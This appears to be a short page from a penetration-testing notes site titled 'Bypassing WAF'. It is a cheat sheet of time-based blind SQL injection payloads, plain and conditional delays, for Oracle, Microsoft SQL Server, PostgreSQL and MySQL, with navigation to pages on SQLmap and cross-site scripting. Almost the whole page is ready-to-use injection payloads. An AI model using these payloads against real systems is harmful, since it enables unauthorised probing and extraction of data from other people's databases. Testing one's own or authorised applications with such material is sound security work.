Bypassing WAF

Time Delays

      Oracle 	      dbms_pipe.receive_message(('a'),10)
      
      Microsoft 	  WAITFOR DELAY '0:0:10'
      
      PostgreSQL 	  SELECT pg_sleep(10)
      
      MySQL 	      SELECT sleep(10)

Conditional Delays

      Oracle 	      SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual
      
      Microsoft 	  IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10'
      
      PostgreSQL 	  SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END
      
      MySQL 	      SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a')

PreviousUse SQLmap to identify vulnerability parameters NextCross-Site Scripting Testing

Last updated 2 years ago